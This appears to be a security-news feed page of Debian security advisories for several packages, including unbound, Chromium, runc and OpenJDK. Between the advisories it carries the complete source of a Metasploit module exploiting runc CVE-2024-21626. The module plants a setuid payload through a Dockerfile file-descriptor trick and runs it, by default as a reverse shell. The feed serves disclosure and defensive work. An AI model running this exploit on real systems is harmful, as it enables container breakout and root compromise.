Debian Linux Security Advisory 5620-1 - Two vulnerabilities were discovered in unbound, a validating, recursive, caching DNS resolver. Specially crafted DNSSEC answers could lead unbound down a very CPU intensive and time costly DNSSEC (CVE-2023-50387) or NSEC3 hash (CVE-2023-50868) validation path, resulting in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5620-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoFebruary 14, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : unboundCVE ID         : CVE-2023-50387 CVE-2023-50868Debian Bug     : 1063845Two vulnerabilities were discovered in unbound, a validating, recursive,caching DNS resolver. Specially crafted DNSSEC answers could leadunbound down a very CPU intensive and time costly DNSSEC(CVE-2023-50387) or NSEC3 hash (CVE-2023-50868) validation path,resulting in denial of service.Details can be found athttps://nlnetlabs.nl/downloads/unbound/CVE-2023-50387_CVE-2023-50868.txtFor the oldstable distribution (bullseye), these problems have been fixedin version 1.13.1-1+deb11u2.For the stable distribution (bookworm), these problems have been fixed inversion 1.17.1-2+deb12u2.We recommend that you upgrade your unbound packages.For the detailed security status of unbound please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/unboundFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmXMYixfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TxMxAAmy00/kTKXoaX+YGFHPIZmwdtP/eQnx9SreT40TrvASi7O5d/LKQUhMpYfEPqekyPCmfa/XkFZZVecyaNInoeyuf2olpQ5+gTgZMoxllccCFWqyO+TVhJtobf8iJttIwwdGYToH/tENr2Ady2Rgg5oy8WILF/5F2bckn2dgQAWUw4Tl7K9rkCf1JryO4KJGhXtNpaQZJnvX5dmwm7gDwkXsc9j85diRTRUF14IaMiiPKUpcxmogOGDYJcvY6lBFdLOfmzo1f3BO8SzNV+G0h7kCn/7w9RdpOWqTQoZHdT6IkT0YsZzLuJ0bVyoLWxi8Kh4fdAbEiyffVk0kLOWUmup9hckUSIXQktvOK6koFecm01W8OBzQ/HsB/DNExfo1l7GjAaAv+EkQHMdkiMqdoLI4oduuBxa2nFdCpDESaTN7Li6S0JtVc1YUu+UKHido3J0/U4xleL8sPPupJ2yVwOmbkeqK3hxH0J+e/uDT6mfrZ0moEEjOyAper8lqu4TS7rSK0e6/nNQs8dEEcoQQL1B3HXyXqjOBcMM4A1wPkJib8j2use64/+vIz69tMflOwUxBirQ/J4PGLWTQmIoxF6NNzqTWgeFMIuq1NXIy7t3TPIIgW3+VWsNJwKAe8HGZITdiBpGdSDFEa5qYKtiYQS6NxSx/fzyYNlfv7rUzrSNgQ==m2j/-----END PGP SIGNATURE-----

Debian Security Advisory 5620-1

Debian Linux Security Advisory 5619-1 - Two vulnerabilities were discovered in libgit2, a low-level Git library, which may result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5619-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 09, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libgit2CVE ID         : CVE-2024-24577 CVE-2024-24575Two vulnerabilities were discovered in libgit2, a low-level Git library,which may result in denial of service or potentially the execution ofarbitrary code.For the oldstable distribution (bullseye), this problem has been fixedin version 1.1.0+dfsg.1-4+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 1.5.1+ds-1+deb12u1.We recommend that you upgrade your libgit2 packages.For the detailed security status of libgit2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libgit2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXGeNgACgkQEMKTtsN8TjatpBAAtY1nwqlQFnE//mah+rLfyeOtoM0XutnWZasAALawlg6h9RKMaOy7R1D3MKk5o4i5U7KqQih6YtCTy4JDfgZzJ+kCVXD5uEWEW6qRZGnEMXYtgrAUkG7VNCcGMwGei4nQFf1ZyCsP1ShaWyXa/sVkLtVYvqrWdXRSxf9p5Ky3lQh3cd9GXK3sWUbnzF3UK0ZFkocEmIX4qLE60s1bMQb/IrlgXguSutMqC5EHiVRhBvINmf3zC+ggLvk5fNre4rKns7RizMrkBKYFVwCeCXaBtKYhyE7T3otWu5mGsanE1c7aGTZDIH9HpRsT1JR9W5XI5HcDusajDJNy5v+Wl2/ohIfB3kECsfPITVql832X5DtqSNazNLA0RnYuAOa+7wElLrh6X2yFrahViOmie4smfc97LznpPhAXqy++jxnnYDTLUK/BCX3bIp5RkCTz5s6fsi64/2SO9KQscw+zKzKHSrIuPU42JYxfpo17kVDWfhU0mUbyygKFQmSKUQndaGUYpLXk7Iv4aoAXXRlWjV21uxxByKziDfHalTfthp2BjTmVdEutD/cc6Uwk9OJFnCMPBat07l4HlOypv0iYddNj7HVqOvgQz7NUuYLuDvC8VwdLgy4XyI8HnKmFOpMv04eqbwbTnv8uKvvvFMOMLWUEkS081a5tHmdVx0mJWInRW5k==ixWD-----END PGP SIGNATURE-----

Debian Security Advisory 5619-1

Debian Linux Security Advisory 5618-1 - Vulnerabilities have been discovered in the WebKitGTK web engine. An anonymous researcher discovered that a maliciously crafted webpage may be able to fingerprint the user. Wangtaiyu discovered that processing web content may lead to arbitrary code execution. Apple discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5618-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
February 08, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-23206 CVE-2024-23213 CVE-2024-23222

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-23206

    An anonymous researcher discovered that a maliciously crafted  
    webpage may be able to fingerprint the user.

CVE-2024-23213

    Wangtaiyu discovered that processing web content may lead to  
    arbitrary code execution.

CVE-2024-23222

    Apple discovered that processing maliciously crafted web content  
    may lead to arbitrary code execution. Apple is aware of a report  
    that this issue may have been exploited.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.42.5-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.42.5-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmXFXGQACgkQAAyEYu0C  
2AJWJA//fFEMVOvrgBf8I2Nnz37Bm/jR4IRM52osjsI6I23tjJ1vA9UR7Y/03QGN  
qOzfOsb6wcRGZfYdEy945N6vf/XN3opl44ApyJ6RHStbQ8EuTw+IXVSKs49x6FBC  
P7glTc3I4R5gYpOKDwc/jQwkB6VeCYPq0LeqgVNx2/Ja0eJ3KUEjXo+yYJbowRj+  
oiR9R+WKIEnz7BdxMbOLrlHc9CpR3UynozFprFha8bKNlyJAq/hwsO546NgYnSQH  
+n/hAad1NDvcptljLHrXjw/GYTVc2lEGoFFr8H8EDVdWrtzSlecHenthIxfjoKL9  
4eWGvilyZJGAKvtlaNRCFNorHTsAcqRUYhDT87TNScU+ONwdk3tdl9d4F/CcTylA  
7ZQGQ1OQk2f5h/E2Ns1CD0KE64+Qv4Eima/A7VNDKc2hXPNavaekIbziVKEJ4r+m  
ypJrJDm+RLeOcDKuyxfz6REQvAOinjMnfPQhMXRCdk4vz3RXl9bEpoao35C2rtLe  
HcL3/tg24hOooj6NJYQRuiKfmrZKhHivNrg4QJ/71Y1/JXtlmLiol6h8nfKKvb19  
ObFGbF27htKmSGXR3Oig5tQWcjhnbH4CSqXoTOYwDPRgb9dutViclKu605A97Fm5  
l5U0fyIT8mwkN/thk8KOE1AtNC2n90Y9Yx/gBPFRypHN+CBQCbY=  
=Lfkz  
-----END PGP SIGNATURE-----

Debian Security Advisory 5618-1

Debian Linux Security Advisory 5617-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5617-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 08, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1283 CVE-2024-1284Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 121.0.6167.160-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIyBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmXEllwACgkQZF0CR8NudjcIrQ/4nDJyajY62INMkRpAFjT9a7+IDO5ozl2IcYf7+Jz11HhZmc891MSHbnFEVeZfaCFGmt6Xo9WRwvDlkDjAiQ7jA571PoNE8cF3oaLpD6+6/oj2apUpD7LkTNaviWRct19zRflJyhehYl2oxR7A0Yi6GTvGtn+azkhoqYTSw9WWdFzKNI1wmpID0bxp+CgtzZmVkDCa0WFM4MP2C+IdGWzhBTc9+7VggO91ATAwHscSJ/2D3jJVJMVP8vKqla6QJabGwo7N3wRE3aB3YybluhvYWzhaOmf8oNavwFarEwrEhm5siJWadkte7OlZeusBfONZVircFx4zqfYqilyCLx384qlKyRtjwMwiTE/vk61xm3dl6AV5mUIbyVu4FUIVTftBBE0mwW055ncDCEy3FgEc3ZRxFdvolcWJhONt6f8jAn6iOfH82nQ8SfVmgpQPP2eKLHT/l9IT9T0blJYlNIjXM1T4IjMZvtFb7KUp9rP/T2UDDKwxR8ahs0/EC7FubjjzhnmZFAe/L2xFlM612Fl+C+6mgqUH0oS0TF6CLmWH1gNuXUFjiyVL+zkQA7Fcp6iiUdhSrEAz8y+Igv0Ty2n06xRxkUF3t1SG6XxAxbKW3BuyEz5B9fivLh9KzXGiXWHrvpTHvNYMuKPXeOM9QvcFKhzXLvcWRpirgC22ca7JNA===+kgA-----END PGP SIGNATURE-----

Debian Security Advisory 5617-1

Debian Linux Security Advisory 5616-1 - It was discovered that ruby-sanitize, a whitelist-based HTML sanitizer, insufficiently sanitized style elements, which may result in cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5616-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 05, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ruby-sanitizeCVE ID         : CVE-2023-36823It was discovered that ruby-sanitize, a whitelist-based HTML sanitizer,insufficiently sanitised <style> elements, which may result incross-site scripting.For the oldstable distribution (bullseye), this problem has been fixedin version 5.2.1-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 6.0.0-1.1+deb12u1.We recommend that you upgrade your ruby-sanitize packages.For the detailed security status of ruby-sanitize please refer toits security tracker page at:https://security-tracker.debian.org/tracker/ruby-sanitizeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXBWGUACgkQEMKTtsN8TjZKxRAAmKe0iFtImy6hV4qVVAAWxtWArqFhQlMS6SDiBdkkN+0Ep3QMnBX1DKdqHYjtaKSaSr6ho6oWtmQQc4YQfVze+EwQfCQKERYenoJtYS1ljsfrmMpnF6dmonOJzG5W9nf/8JVqmUwwmVCEGtATPBWu7SqLb5zkKqh6zPyf853bNBAqjE6z+CbWaYEkCkIsfe7euOOW3zIIF2GiYCZBEkM9HieehyZdDVOlwTsIlMiELU5BX1eAFAdyBZhoky88c2N4a0uSE8WWXoaNJN5T55sAv1DdqQF0sqfWxOXmmhcu6xbpif4Qh82CO58awW+m/DUHwqSr5pSey2AlThamV0H9CvKOkhZZWQ67ew9HpDEd2AW9aOv0TKuCMGBXqovvSHjvmAI6Jg4VlFe1rD9yFXEhvB5A34/9mh3IRKSk01jrGXIkDqYGPYGEbAle/qGwrTQvUou/js5flST87i3YYh0J8+WzldtVt42jr4RbjcvVefe+sQA8G0ILEgM/+CYjMjSjefnJkTEjGOix522D/qukpBimLjPL+/28Vk41PzF8+q4t665oqpNFHaaGTlrjnoo0HXAxKDpSoK6LbclQGmPjRDe/CFBEUj7tAY5IUXt4yiNLlil3bCCAM5czlnVx3V1Cs236JTwVjR1YFtPUf5/tL7cLyPeelQWenHQ/YJDf4dk==5owE-----END PGP SIGNATURE-----

Debian Security Advisory 5616-1

Debian Linux Security Advisory 5615-1 - It was discovered that runc, a command line client for running applications packaged according to the Open Container Format (OCF), was susceptible to multiple container break-outs due to an internal file descriptor leak.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5615-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 04, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : runcCVE ID         : CVE-2024-21626It was discovered that runc, a command line client for runningapplications packaged according to the Open Container Format (OCF), wassuspectible to multiple container breakouts due to an internal filedescriptor leak.For the oldstable distribution (bullseye), this problem has been fixedin version 1.0.0~rc93+ds1-5+deb11u3.For the stable distribution (bookworm), this problem has been fixed inversion 1.1.5+ds1-1+deb12u1.We recommend that you upgrade your runc packages.For the detailed security status of runc please refer toits security tracker page at:https://security-tracker.debian.org/tracker/runcFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW/2/oACgkQEMKTtsN8TjbbzxAAh2354+lngRRQ7hLtEYgFa8SrkJmgIAMPvR5S1fNWh60wOdUG1690QuzxQm19ZpcF/QJFw6yefECYHWMzmqBJiv2WNadGOT7S9YqZ+ILz/ohwA+1HjH92F/Xl5BTA+Rg9O2hTSqGdDUB8qPpz0/mBin89m1B0y6xpLgF2C/3NiNkOeiuSmVcMsAc/h64VovNPuRGz3/VcPPyO85avjL6ZXEA9L48dPoliTzonNOk+DRgYb4YsFTP1T0RcyrchTLljMkCx2l8gVWKD0BLtH8wDO12kOAlAtnPN9ufB9FXfe9axobvOYalYzOca5/kvRVZ246GwyUG+OM9y01AJsZzKMHnqcT8T3q27FRGu9OFYMN0gONnTLiwEYrjxonzBApm0OPg5XqflRTxVL154tIQi9jmyxGDsHdRmtBCeQw2B7bvoX/bpFijcjvP3FLSWkKmduGocrYm4FgnwiYgh4714fo56HZG4x9u+Y4iplPQWlnv9dEVAzw/oUGr+z0s1TJLfZYEZSpmju2e7afiZbRHdB7YBx8wj02R7yIJJF2sF3tk5eo2UpRJzBSwaolek8b4PcQBsT5h8UAmT0z6WhSFOXwjhmkMD61OFUoPEmWlXJz9VbbWuqmd4R23iYq3r9nkaieQutrbc+i7EXMUT42ogZgOFBG1mQPXeL8PECXfnazs==H2CG-----END PGP SIGNATURE-----

Debian Security Advisory 5615-1

runc versions 1.1.11 and below, as used by containerization technologies such as Docker engine and Kubernetes, are vulnerable to an arbitrary file write vulnerability. Due to a file descriptor leak it is possible to mount the host file system with the permissions of runc (typically root). Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'runc (docker) File Descriptor Leak Privilege Escalation',        'Description' => %q{          All versions of runc <=1.1.11, as used by containerization technologies such as Docker engine,          and Kubernetes are vulnerable to an arbitrary file write.          Due to a file descriptor leak it is possible to mount the host file system          with the permissions of runc (typically root).          Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Rory McNamara' # Discovery        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'URL', 'https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/'],          [ 'URL', 'https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv'],          [ 'CVE', '2024-21626']        ],        'DisclosureDate' => '2024-01-31',        'DefaultTarget' => 0,        'Notes' => {          'AKA' => ['Leaky Vessels'],          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'DefaultOptions' => {          'EXITFUNC' => 'thread',          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'MeterpreterTryToFork' => true        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]),      OptString.new('DOCKERIMAGE', [ true, 'A docker image to use', 'alpine:latest' ]),      OptInt.new('FILEDESCRIPTOR', [ true, 'The file descriptor to use, typically 7, 8 or 9', 8 ]),    ]  end  def base_dir    datastore['WritableDir'].to_s  end  def check    sys_info = get_sysinfo    unless sys_info[:distro] == 'ubuntu'      return CheckCode::Safe('Check method only available for Ubuntu systems')    end    return CheckCode::Safe('Check method only available for Ubuntu systems') if executable?('runc')    # Check the app is installed and the version, debian based example    package = cmd_exec('runc --version')    package = package.split[2] # runc, version, <the actual version>    if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2       package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched       package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched      return CheckCode::Appears("Vulnerable runc version #{package} detected")    end    unless package&.include?('+esm') # bionic patched with 1.1.4-0ubuntu1~18.04.2+esm1 so anything w/o +esm is vuln      return CheckCode::Appears("Vulnerable runc version #{package} detected")    end    CheckCode::Safe("runc #{package} is not vulnerable")  end  def exploit    # Check if we're already root    if !datastore['ForceExploit'] && is_root?      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'    end    # Make sure we can write our exploit and payload to the local system    unless writable? base_dir      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    # create directory to write all our files to    dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    mkdir(dir)    register_dirs_for_cleanup(dir)    # Upload payload executable    payload_path = "#{dir}/.#{rand_text_alphanumeric(5..10)}"    vprint_status("Uploading Payload to #{payload_path}")    write_file(payload_path, generate_payload_exe)    register_file_for_cleanup(payload_path)    # write docker file    vprint_status("Uploading Dockerfile to #{dir}/Dockerfile")    dockerfile = %(FROM #{datastore['DOCKERIMAGE']}    WORKDIR /proc/self/fd/#{datastore['FILEDESCRIPTOR']}    RUN cd #{'../' * 8} && chmod -R 777 #{dir[1..]} && chown -R root:root #{dir[1..]} && chmod u+s #{payload_path[1..]} )    write_file("#{dir}/Dockerfile", dockerfile)    register_file_for_cleanup("#{dir}/Dockerfile")    print_status('Building from Dockerfile to set our payload permissions')    output = cmd_exec "cd #{dir} && docker build ."    output.each_line { |line| vprint_status line.chomp }    # delete our docker image    if output =~ /Successfully built ([a-z0-9]+)$/      print_status("Removing created docker image #{Regexp.last_match(1)}")      output = cmd_exec "docker image rm #{Regexp.last_match(1)}"      output.each_line { |line| vprint_status line.chomp }    end    fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.") if output.include? "mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory"    fail_with(Failure::NoAccess, 'Payload SUID bit not set') unless get_suid_files(payload_path).include? payload_path    print_status("Payload permissions set, executing payload (#{payload_path})...")    cmd_exec "#{payload_path} &"  endend

runc 1.1.11 File Descriptor Leak Privilege Escalation

Debian Linux Security Advisory 5614-1 - Two vulnerabilities were discovered in zbar, a library for scanning and decoding QR and bar codes, which may result in denial of service, information disclosure or potentially the execution of arbitrary code if a specially crafted code is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5614-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoFebruary 03, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : zbarCVE ID         : CVE-2023-40889 CVE-2023-40890Debian Bug     : 1051724Two vulnerabilities were discovered in zbar, a library for scanning anddecoding QR and bar codes, which may result in denial of service,information disclosure or potentially the execution of arbitrary code ifa specially crafted code is processed.For the oldstable distribution (bullseye), these problems have beenfixed in version 0.23.90-1+deb11u1.For the stable distribution (bookworm), these problems have been fixedin version 0.23.92-7+deb12u1.We recommend that you upgrade your zbar packages.For the detailed security status of zbar please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/zbarFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW+cM5fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RZEQ/+LBd+YadiS/TNfrBy9lYnugnavklh9VSEkO+sKYFVzkq/ypQwuaLA0MaIt0OOIGIrwDVXL0/Lb6Rjuo96PGQX6NJXF2iG7UUD8RjiJDHIFPUP9nbWOjXmNAdtnfUvF9AwyExSpCREhXc2PTDc5lmnAu56NWrJRN53RqngbYSxILoOpNRBDlZUEL3RNrbpPvpQnvIBo2JcmaT/PtgC+U5bxKfnQGQ2Cree/nyq8de9VCPwGeTczqFz8I3NsklG9k8/09+zdJOUpy+KVi+ylTAG/f/ydzGtrFyr++hPU692PIGeu++N3yNX1mP9KWhsAdkfL581RauwKRgHFnRXK/yUDg7rDUlMRd0w5QphDkL+01mjzgiooGBp5I7OGXvdVgribWdexRiKE0nfzf6sHxzbHXRdCOiPWhGAf5w6ORdpgRwuICo4mWTw1T8GJktFfuLXP7uRIdVIMeIVVVLfFYBQeTr8g7A0TV1ysAzG+yjHVhfYJxTVS9rTNmt8MJbO6ZBgWnMdMbd+4xlngWMpxDOInhdFBTmbyBdWnbMOQDZhgXLy0Hd0VF96UoQkWoHxphpbioY5on053jSsU6FH0r1bSm5rjOfCkRVLalCTjZyY4TqCSmbTlq3qyxUHgT9ws2M+//SpJKzwGvVXN8+0M3BzVXUGJYmLG0v0/+jb58wUBUA==OOtS-----END PGP SIGNATURE-----

Debian Security Advisory 5614-1

Debian Linux Security Advisory 5613-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in side channel attacks, leaking sensitive data to log files, denial of service or bypass of sandbox restrictions.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5613-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 01, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-17CVE ID         : CVE-2024-20918 CVE-2024-20919 CVE-2024-20921 CVE-2024-20926                  CVE-2024-20932 CVE-2024-20945 CVE-2024-20952Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in side channel attacks, leaking sensitive data to logfiles, denial of service or bypass of sandbox restrictions.For the oldstable distribution (bullseye), these problems have been fixedin version 17.0.10+7-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 17.0.10+7-1~deb12u1.We recommend that you upgrade your openjdk-17 packages.For the detailed security status of openjdk-17 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-17Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW8HJwACgkQEMKTtsN8Tjbt9A//Xgt7dwtzkBgkxjJ9Tq6pqQGqYzQQjID6xmyta+/oZ9FJzPojV+1I7z7YeOOYrXHmCU9EM30Gbwtt4aEBbz1lvAk1mYC5Ob5TE+oYS/r76REJS89IqkNpmlpWFMzQICgPDHPE1Vm3HyitF6Xy9CLOFZBeH0wELhzuHAIOd4rb+XqQsW8JW4V12ZoLAVHoP5U2PGBPWVbyEY06LTgyEe06L+XX1zSiPnRnhdeTs7YD69SxMUP9AF7QvfIzOvzLw0u0M4g7KNzZ+43OJOdlbq76KzfcqfkoxWA3902vYewfyncx5HVCNpCQdrESIt9Xjqojmda7dh0V9EIGP3HHFufjWnJTOegPqeJ2RV03LkpOygg1W+XEHn32fcA1EtqDYUW67jsu81dYZs2wc2YqALJfjYjeUKBdcRD91MUqn7uBpCfPd9Yo1rrO2dqyeBgQeI7itzdM+bEtCkuVcnyCWr4rXK4kt2xpIdkcwUZxCosQ7FX/TchvyPvDk2LQSMg2azCSAhcrv7aB/jzxlvSF/iRzQipdLmRgc4H+8TY0lG43m7xzHlyu3TXerDNIBQGktkWo6182rScrO+t0brfcCpTxUQwGyBrHh7SQURdvffZPCJ36/7YmjGSWZi4qafr6OfTCGDlt/BcE5fhROsA7OKNgwumUz9hqSK3mCFBDmhDQDTw==Suvn-----END PGP SIGNATURE-----

Debian Security Advisory 5613-1

Debian Linux Security Advisory 5612-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5612-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 01, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1059 CVE-2024-1060 CVE-2024-1077Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 121.0.6167.139-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmW742EACgkQZF0CR8NudjdCCA//R3r8wJi68kZQZOOUeekz1PrrGI/uFuD3Ial5GxJytfKDyuXI8d55GyXbqCZzMQYeL0l9JO5wEscb2wixvnaD+4zG1cb6hwMFo7Rae1KMMgo9JHKgOFVIPnI9upvtDI8GdQoJyhoVIRab4FkD09lNUYIz2UCUJEwORa7+JVaCoSYiG3Mkj2p2SDwxpn2BiN5rI/G/GrfF/nJuJ+ebiZsh3jQyfsreomKo6Bq3ajsYKs5G4osOxK164Mjp8gKYx82dzxiK2e/58gvEUdY3h3oG8twQMJ5VrYgIT19Ih4XNpn50x4Bn+OlzTR7vPG6RuOgTY/XjHr4Pfc+NYd7hEfyH37KODFUCC5482jCY9aLSHmP/poGmo8SfSBO+H7NmZC8g8co2hOf30Bczfndb4TMpz8PRz/zojzBWmL2mIYU/O0aavcS+xO8gy753xuoESFbjj9Z0j5YRphyCyh/aB3gKxiY+LMh97EEjQWvI8XJucYJ+6IFdNWJOHTNoZEOe7tXnwKQ4EP4BtG7DDfaH7+VaKJ64ZkAqeXK8niIMPGfb7km4o7wVk58XI88+Yj9xtW+8opyBjahmhCwXs+01S2e+BfOb3k22HXBwNZ9Idq0KTtoRm4Jazf/JH3MTQLS8ri5ZFPeqIdkJer2tN0lSv2KeVASYd1j3oCgG2LJA6eHiNhE==B96X-----END PGP SIGNATURE-----

Tag

#debian